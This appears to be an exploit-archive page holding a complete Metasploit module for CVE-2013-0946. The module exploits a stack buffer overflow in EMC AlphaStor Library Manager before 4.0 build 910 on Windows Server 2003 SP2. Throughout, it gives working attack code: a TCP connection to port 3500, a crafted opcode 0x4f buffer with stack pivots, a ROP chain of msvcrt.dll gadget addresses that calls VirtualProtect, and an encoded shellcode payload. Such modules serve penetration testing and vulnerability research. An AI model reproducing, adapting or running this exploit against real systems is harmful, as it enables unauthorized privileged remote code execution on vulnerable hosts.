EMC AlphaStor Library Manager < 4.0 build 910 Exploit, Opcode 0x4f Buffer Overflow (Metasploit)Go BackDownload

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'EMC AlphaStor Library Manager Opcode 0x4f',
			'Description'    => %q{
				This module exploits a stack based buffer overflow found in EMC
				Alphastor Library Manager version < 4.0 build 910. The overflow
				is triggered due to a lack of sanitization of the pointers used
				for two strcpy functions.
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ],
					[ 'CVE', '2013-0946' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
					'wfsdelay'	=>	1000
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'	=> 160,
					'DisableNops'	=> 'true',
					'BadChars' => "\x00\x09\x0a\x0d",
					'StackAdjustment' => -404,
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'Compat'        =>
						{
							'SymbolLookup' => 'ws2ord',
						},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 
						'Windows Server 2003 SP2 EN', 
							{ 
								# msvcrt.dll
								# add esp, 0c/ retn
								'Ret' => 0x77bdda70, 
							} 
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 13 2014'))

		register_options(
			[
				Opt::RPORT(3500)
			], self.class )
	end

	def exploit
		connect

		p =  "\x90" * 8
		p << payload.encoded

		# msvcrt.dll
		# 96 bytes
		rop = [
			0x77bb2563,	# pop eax/ retn 
      0x77ba1114,	# ptr to kernel32!virtualprotect
      0x77bbf244,	# mov eax, dword ptr [eax]/ pop ebp/ retn
      0xfeedface,
      0x77bb0c86,	# xchg eax, esi/ retn
      0x77bc9801,	# pop ebp/ retn
      0x77be2265,
      0x77bb2563,	# pop eax/ retn
      0x03C0990F,
      0x77bdd441,	# sub eax, 3c0940fh/ retn
      0x77bb48d3,	# pop eax/ retn
      0x77bf21e0,
      0x77bbf102,	# xchg eax, ebx/ add byte ptr [eax], al/ retn
      0x77bbfc02,	# pop ecx/ retn
      0x77bef001,
      0x77bd8c04,	# pop edi/ retn
      0x77bd8c05,
      0x77bb2563,	# pop eax/ retn
      0x03c0984f,
      0x77bdd441,	# sub eax, 3c0940fh/ retn
      0x77bb8285,	# xchg eax, edx/ retn
      0x77bb2563,	# pop eax/ retn
      0x90909090,
      0x77be6591,	# pushad/ add al, 0efh/ retn
		].pack("V*")

		buf = Rex::Text.pattern_create(514)
		buf[0, 2] =  "O~"											# opcode
		buf[13, 4] = [0x77bdf444].pack('V')		# stack pivot 52
		buf[25, 4] = [target.ret].pack('V')		# stack pivot 12
		buf[41, 4] = [0x77bdf444].pack('V')		# stack pivot 52
		buf[57, 4] = [0x01167e20].pack('V')		# ptr
		buf[69, rop.length] = rop
		buf[165, 4] = [0x909073eb].pack('V')	# jmp $+117
		buf[278, 4] = [0x0116fd59].pack('V')	# ptr
		buf[282, p.length] = p
		buf[512, 1] = "\x00"

		# junk
		buf << "AAAA"
		buf << "BBBB"
		buf << "CCCC"
		buf << "DDDD"

		print_status("Trying target %s..." % target.name)

		sock.put(buf)

		handler
		disconnect
	end

end